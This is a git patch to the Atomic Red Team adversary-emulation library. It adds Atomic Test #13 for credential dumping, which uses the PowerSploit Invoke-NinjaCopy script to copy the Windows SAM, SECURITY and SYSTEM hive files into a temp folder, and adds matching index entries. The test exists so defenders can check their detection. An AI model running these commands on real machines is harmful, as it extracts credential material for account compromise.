From cfa6ae33fc19662469619db8112e0c8bf07e0712 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 23 Dec 2019 15:55:40 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/T1003/T1003.md | 36 ++++++++++++++++++++++++++++++++++++
 atomics/index.md | 1 +
 atomics/index.yaml | 35 +++++++++++++++++++++++++++++++++++
 atomics/windows-index.md | 1 +
 4 files changed, 73 insertions(+)

diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 8a74165a..3e6102f2 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -159,6 +159,8 @@ The /proc filesystem on Linux contains a great deal of information regarding the
 - [Atomic Test #12 - GPP Passwords (Get-GPPPassword)](#atomic-test-12---gpp-passwords-get-gpppassword)
+- [Atomic Test #13 - Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script](#atomic-test-13---dump-sam-security-and-system-files-using-ninjacopy-powershell-script)
+
@@ -429,4 +431,38 @@ Get-GPPPassword -Verbose
+
+
+
+## Atomic Test #13 - Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
+This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
+Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam|
+| system_binary_path | Path of the SYSTEM file | string | C:\Windows\System32\config\system|
+| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security|
+| output_folder | Output folder path | Path | C:\Windows\Temp|
+
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
+```
+. $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
+Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
+Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
+Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
+```
+
+
+#### Cleanup Commands:
+```
+rm "#{output_folder}\sam"
+rm "#{output_folder}\system"
+rm "#{output_folder}\security"
+```
+
diff --git a/atomics/index.md b/atomics/index.md
index 673ed1aa..243dfd76 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -662,6 +662,7 @@
 - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
 - Atomic Test #11: GPP Passwords (findstr) [windows]
 - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
+ - Atomic Test #13: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script [windows]
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1081 Credentials in Files](./T1081/T1081.md)
 - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 7aa4e19b..f042ecfd 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -19627,6 +19627,41 @@ credential-access:
 command: |
 . #{gpp_script_path}
 Get-GPPPassword -Verbose
+ - name: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
+ description: |
+ This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
+ Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
+ supported_platforms:
+ - windows
+ input_arguments:
+ sam_binary_path:
+ description: Path of the SAM file
+ type: string
+ default: C:\Windows\System32\config\sam
+ system_binary_path:
+ description: Path of the SYSTEM file
+ type: string
+ default: C:\Windows\System32\config\system
+ security_binary_path:
+ description: Path of the SECURITY file
+ type: string
+ default: C:\Windows\System32\config\security
+ output_folder:
+ description: Output folder path
+ type: Path
+ default: C:\Windows\Temp
+ executor:
+ name: powershell
+ elevation_required: true
+ command: |
+ . $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
+ Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
+ Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
+ Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
+ cleanup_command: |-
+ rm "#{output_folder}\sam"
+ rm "#{output_folder}\system"
+ rm "#{output_folder}\security"
 T1081:
 technique:
 x_mitre_permissions_required:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 572c6967..97f85256 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -476,6 +476,7 @@
 - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
 - Atomic Test #11: GPP Passwords (findstr) [windows]
 - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
+ - Atomic Test #13: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script [windows]
 - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1081 Credentials in Files](./T1081/T1081.md)
 - Atomic Test #3: Extracting passwords with findstr [windows]